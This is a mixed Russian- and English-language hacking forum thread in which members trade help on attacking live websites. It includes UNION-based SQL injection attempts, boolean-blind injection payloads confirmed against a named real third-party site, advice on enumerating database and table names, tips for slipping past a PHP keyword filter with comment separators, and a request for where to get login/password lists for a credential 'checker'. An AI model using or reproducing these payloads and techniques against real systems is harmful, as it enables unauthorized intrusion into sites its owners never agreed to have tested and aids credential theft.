Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Не доступно? или идет фильтрация?
     
  2. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    106
    Likes Received:
    26
    Reputations:
    5
    log доступен но пишет


    Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 4980736 bytes) in /usr/local/apache/logs/error_log on line 39816
    (типа не хватает памяти ? )

    envirion просто молчит
     
  3. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Да памяти не хватает. а на счет envirion попробуй нулл-байт %00
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    нулл бит тут причем? , написано же "Permission denied"
    нет прав на чтение

    а ошибка с "Fatal error: Allowed memory size...." связано с тем что для обработки файла требуется больше той памяти которое разрешено использовать пыху (нехватка памяти)
     
    _________________________
    1 person likes this.
  5. Lezvie

    Lezvie New Member

    Joined:
    2 Nov 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток..Собственно я новичок на этом форуме, и хотел спросить как вы делаете (базы где вы их берете) особено логин пароль для чекера хотелось ето узнать если можно то дайте сылку чтоб почитать и какие нужны програмы для етова...
     
  6. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    http://forum.antichat.ru/thread43966-SQL+%C8%ED%FA%E5%EA%F6%E8%E8.html
     
  7. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Кручу скуль, подобрал кол-во полей, но вот запрос сикьюэл не режется значками комментов:
    Code:
    Error in query: SELECT * FROM articles,tree WHERE articles.tid=288 [COLOR=Green]union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --[/COLOR]  AND articles.tid=tree.tid AND tshow='1' AND `tstamp` LIKE '2011%' ORDER BY aid DESC. The used SELECT statements have a different number of columns
    Как быть?
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    The used SELECT statements have a different number of columns


    Просто колонок не столько
     
  9. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Колонок столько. Это сообщение выводиться в теле сайта, который загрузился (с контентом). А когда число колонок не подходит, сайт не загружается а только эррор маскуеля (на белом фоне черный текст ошибки).
     
  10. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Is this really vulnerable?

    Code:
    http://www.gomlab.com/eng/forum.html?mode=announceView&a=125%27&no=
    I've tried all attempts on it.
     
  11. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Там несколько последующих запросов просто.
    Выводи в ошибке, или же ищи вывод первого запроса.
     
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Code:
    http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125[COLOR=Magenta]+and+1=1  TRUE[/COLOR]
    
    http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125[COLOR=Magenta]+and+1=2  FALSE[/COLOR]
    Yes, this is vulnerable
     
    _________________________
  13. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Sure. Well the problem is, I can't get order by or group by.

    Can you just help a bit further?
     
  14. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    200
    Likes Received:
    262
    Reputations:
    32
    Yes, we can help if you write the url, where you "can't get order by or group by"
     
  15. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Thanks sir.

    Code:
    http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1  TRUE
    
    http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2  FALSE
    I tried http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=1(order by and string based= nothing works)

    http://www.gomlab.com/eng/forum.html?mode=announceView&no=&a=125+and+1=2 FALSE(order by and string based= nothing works)

    Any help now? Thanks.
     
  16. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    200
    Likes Received:
    262
    Reputations:
    32

    SQL-Injection in PostgreSQL DB
    Part 2
    :eek:
     
  17. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Well received, thank you.
     
  18. Goodwin_

    Goodwin_ Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    подскажите, вот есть запрос:
    показывает имена всех таблиц.
    такой запрос:
    покажет имена баз данных в которых есть таблица с именем 0х0000?
    ок, например после последнего запроса вывелось несколько имён баз данных. как получить имена таблиц из каждой по отдельности?
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    where table name='имя таблицы' and table_schema='имя_базы'

    пора уже взятся за учебник SQL..
     
    _________________________
    4 people like this.
  20. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Есть такой вот фильтр
    PHP:
    $filter[3] = array( "select""delete""union""update""insert""\\""'"","";""--""-""%20""%27"" ""`""=""%" );
    $data str_replace$filter[$op], ""strtolower$data ) );
    И есть запрос в бд в котором он обрабатывает объект
    PHP:
    $db->Query "SELECT * FROM admin WHERE login='" $this->adm_name "'" );
    Обойти select,union можно пробелом внутри, в качестве разделителя /**/, запятые тоже не проблема. Не получается обойти кавычку, можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...
     
Thread Status:
Not open for further replies.